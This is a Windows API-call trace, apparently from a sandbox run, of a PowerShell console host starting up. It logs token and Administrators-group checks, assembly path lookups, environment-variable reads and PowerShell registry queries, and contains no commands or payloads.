	[0459.748] GetTokenInformation (in: TokenHandle=0x330, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16d938 | out: TokenInformation=0x0, ReturnLength=0x16d938) returned 0
	[0459.749] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1c7340
	[0459.749] GetTokenInformation (in: TokenHandle=0x330, TokenInformationClass=0x8, TokenInformation=0x1c7340, TokenInformationLength=0x4, ReturnLength=0x16d938 | out: TokenInformation=0x1c7340, ReturnLength=0x16d938) returned 1
	[0459.749] CheckTokenMembership (in: TokenHandle=0x32c, SidToCheck=0x2daaa58*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x16daa8 | out: IsMember=0x16daa8) returned 1
	[0459.749] CloseHandle (hObject=0x32c) returned 1
	[0460.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0460.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0460.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0460.254] CoTaskMemAlloc (cb=0x804) returned 0x1b820880
	[0460.254] GetConsoleTitleW (in: lpConsoleTitle=0x1b820880, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0460.758] CoTaskMemFree (pv=0x1b820880) 
	[0460.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0460.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0460.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0460.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0461.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0462.231] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0462.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.232] CoTaskMemFree (pv=0x252f10) 
	[0462.245] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0462.733] CoCreateGuid (in: pguid=0x16db90 | out: pguid=0x16db90*(Data1=0xc5f5bd07, Data2=0xa94a, Data3=0x442e, Data4=([0]=0x8b, [1]=0xe9, [2]=0xc, [3]=0x47, [4]=0x8e, [5]=0xb1, [6]=0xef, [7]=0x5f))) returned 0x0
	[0462.735] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0462.735] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.735] CoTaskMemFree (pv=0x252f10) 
	[0462.758] WinSqmIsOptedIn () returned 0x0
	[0462.758] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0462.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.758] CoTaskMemFree (pv=0x252f10) 
	[0462.759] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0462.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.759] CoTaskMemFree (pv=0x252f10) 
	[0462.759] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0462.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.760] CoTaskMemFree (pv=0x252f10) 
	[0462.760] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0462.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.760] CoTaskMemFree (pv=0x252f10) 
	[0462.761] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0462.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.761] CoTaskMemFree (pv=0x252f10) 
	[0462.762] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0462.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.762] CoTaskMemFree (pv=0x252f10) 
	[0462.763] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0462.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.763] CoTaskMemFree (pv=0x252f10) 
	[0462.763] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0462.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.763] CoTaskMemFree (pv=0x252f10) 
	[0462.767] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0462.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.767] CoTaskMemFree (pv=0x252f10) 
	[0462.772] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0462.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.772] CoTaskMemFree (pv=0x252f10) 
	[0462.773] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0462.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.773] CoTaskMemFree (pv=0x252f10) 
	[0462.773] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0462.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0462.773] CoTaskMemFree (pv=0x252f10) 
	[0465.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0465.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0465.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0465.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.284] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0466.284] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0466.284] CoTaskMemFree (pv=0x252f10) 
	[0466.285] CoTaskMemAlloc (cb=0xcc) returned 0x1b81efb0
	[0466.286] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b81efb0, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0466.286] CoTaskMemFree (pv=0x1b81efb0) 
	[0466.286] CoTaskMemAlloc (cb=0xf0) returned 0x1b80c740
	[0466.286] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b80c740, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0466.286] CoTaskMemFree (pv=0x1b80c740) 
	[0466.286] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d708 | out: phkResult=0x16d708*=0x338) returned 0x0
	[0466.286] RegQueryValueExW (in: hKey=0x338, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d68c, lpData=0x0, lpcbData=0x16d688*=0x0 | out: lpType=0x16d68c*=0x2, lpData=0x0, lpcbData=0x16d688*=0x6c) returned 0x0
	[0466.286] CoTaskMemAlloc (cb=0x70) returned 0x2025a0
	[0466.286] RegQueryValueExW (in: hKey=0x338, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d65c, lpData=0x2025a0, lpcbData=0x16d658*=0x6c | out: lpType=0x16d65c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x16d658*=0x6c) returned 0x0
	[0466.286] CoTaskMemFree (pv=0x2025a0) 
	[0466.286] CoTaskMemAlloc (cb=0xcc) returned 0x1b81efb0
	[0466.286] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b81efb0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0466.286] CoTaskMemFree (pv=0x1b81efb0) 
	[0466.286] CoTaskMemAlloc (cb=0xcc) returned 0x1b81efb0
	[0466.286] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b81efb0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0466.286] CoTaskMemFree (pv=0x1b81efb0) 
	[0466.789] RegCloseKey (hKey=0x338) returned 0x0
	[0466.789] CoTaskMemAlloc (cb=0xcc) returned 0x1b81efb0
	[0466.790] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b81efb0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0466.790] CoTaskMemFree (pv=0x1b81efb0) 
	[0466.790] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d708 | out: phkResult=0x16d708*=0x338) returned 0x0
	[0466.790] RegQueryValueExW (in: hKey=0x338, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d68c, lpData=0x0, lpcbData=0x16d688*=0x0 | out: lpType=0x16d68c*=0x0, lpData=0x0, lpcbData=0x16d688*=0x0) returned 0x2
	[0466.790] RegCloseKey (hKey=0x338) returned 0x0
	[0466.801] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0466.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0466.801] CoTaskMemFree (pv=0x252f10) 
	[0466.804] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0466.804] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0466.804] CoTaskMemFree (pv=0x252f10) 
	[0466.808] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0466.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0466.808] CoTaskMemFree (pv=0x252f10) 
	[0466.808] CoTaskMemAlloc (cb=0x104) returned 0x252f10
	[0466.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x252f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0466.808] CoTaskMemFree (pv=0x252f10) 
	[0466.810] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4f8 | out: phkResult=0x16d4f8*=0x338) returned 0x0
	[0466.811] RegQueryValueExW (in: hKey=0x338, lpValueName="path", lpReserved=0x0, lpType=0x16d50c, lpData=0x0, lpcbData=0x16d508*=0x0 | out: lpType=0x16d50c*=0x1, lpData=0x0, lpcbData=0x16d508*=0x74) returned 0x0
	[0466.811] RegQueryValueExW (in: hKey=0x338, lpValueName="path", lpReserved=0x0, lpType=0x16d47c, lpData=0x0, lpcbData=0x16d478*=0x0 | out: lpType=0x16d47c*=0x1, lpData=0x0, lpcbData=0x16d478*=0x74) returned 0x0
	[0466.811] CoTaskMemAlloc (cb=0x78) returned 0x2025a0
	[0466.811] RegQueryValueExW (in: hKey=0x338, lpValueName="path", lpReserved=0x0, lpType=0x16d44c, lpData=0x2025a0, lpcbData=0x16d448*=0x74 | out: lpType=0x16d44c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d448*=0x74) returned 0x0
	[0466.811] CoTaskMemFree (pv=0x2025a0) 
	[0466.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0466.811] SetErrorMode (uMode=0x1) returned 0x1
	[0466.811] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d3d0 | out: lpFileInformation=0x16d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0466.811] SetErrorMode (uMode=0x1) returned 0x1
	[0466.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
